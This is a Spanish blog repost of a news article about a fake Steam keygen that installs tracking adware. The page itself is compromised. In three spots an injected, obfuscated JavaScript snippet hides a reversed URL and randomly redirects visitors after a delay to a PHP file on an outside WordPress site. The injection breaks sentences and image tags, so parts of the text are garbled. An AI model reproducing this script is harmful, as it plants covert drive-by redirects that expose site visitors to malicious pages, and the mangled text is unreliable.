Steam Keygen, un nuevo malware llega a los usuarios
Muchos de los usuarios de Internet siempre prefieren conseguir elementos gratis antes que pagar por ellos. Los piratas informáticos son conscientes de ello y por ello en muchas ocasiones suelen esconder software no deseado en activadores de juegos, generadores de claves o “parches” que permitan, por ejemplo, conseguir juegos gratis en Steam. Un ejemplo de esto último es lo que ha tenido lugar en las últimas horas y ya se ha llevado consigo un considerable número de víctimas.
Recientemente ha empezado a distribuirse por la red un vídeo en el que se muestra cómo un generador de claves de Steam permite crear claves válidas para activar videojuegos en la aplicación de la distribuidora. El vídeo estaba disponible en YouTube (aunque ya se ha eliminado) y facilitaba en la descripción un enlace que llevaba a la descarga del supuesto generador de claves.+
Cuando el usuario accedía a la web daban lugar una serie de saltos entre varios dominios para finalmente comenzar a descargar un archivo .zip con el software no deseado instalado en él.
El usuario debía descomprimir el archivo e instalar el fichero .exe que obtiene tras ello. Este fichero es el que en teoría instala el generador de claves, sin embargo si lo analizamos con VirusTotal podemos ver cómo en realizar oculta algo más.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-1-655×578.png?x=634″ alt=”” width=”634″ height=”559″ /></p>
<p>Este archivo esconde en él un software no deseado que también ha sido detectado en otras ocasiones bajo el nombre de ““SketchupPro2015″, “RazerSurroundProCrack” y “HackToolv23″.</p>
<p>Cuando se ejecuta el instalador se puede ver una ventana similar a la siguiente.</p>
<p><img decoding=)
todo tipo de información personal sobre nosotros. Entre las aplicaciones que se intentan instalar cabe destacar:
Coupoon, FastSearch, Nuvision Global Data Remarketer, Cross Browser, AnySend, My Best Offers Today, SushiLeads, Lolli Scan y PPS Video Player
Durante el asistente se da la opción de deshabilitar las aplicaciones publicitarias que no se quieran instalar, sin embargo si desactivamos todas ellas el asistente simplemente nos preguntará si queremos cancelar la instalación. ¿Esto qué significa? Que no existe el generador de claves y que el pirata informático ha llevado a cabo una campaña de phishing para engañar a los usuarios y que infecten sus sistemas de software publicitario.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-3.png?x=480″ alt=”” width=”480″ height=”421″ /><br />
Aunque a simple vista la amenaza es inofensiva (no cifra archivos ni abre puertas traseras a piratas informáticos) en realidad sí que compromete nuestra privacidad ya que las aplicaciones que se instalan moni<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torizan prácticamente toda nuestra actividad y envían constantemente información a los servidores de las terceras empresas con fines desconocidos.
Debemos evitar siempre caer en este tipo de estafas y utilizar un software antivirus actualizado que pueda identificar este tipo de amenazas antes de que sea tarde.
– Ver información original al respecto en Fuente:
http://www.redeszone.net/2015/07/09/steam-keygen-un-nuevo-malware-llega-a-los-usuarios/#sthash.n5PQOJWS.dpuf
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.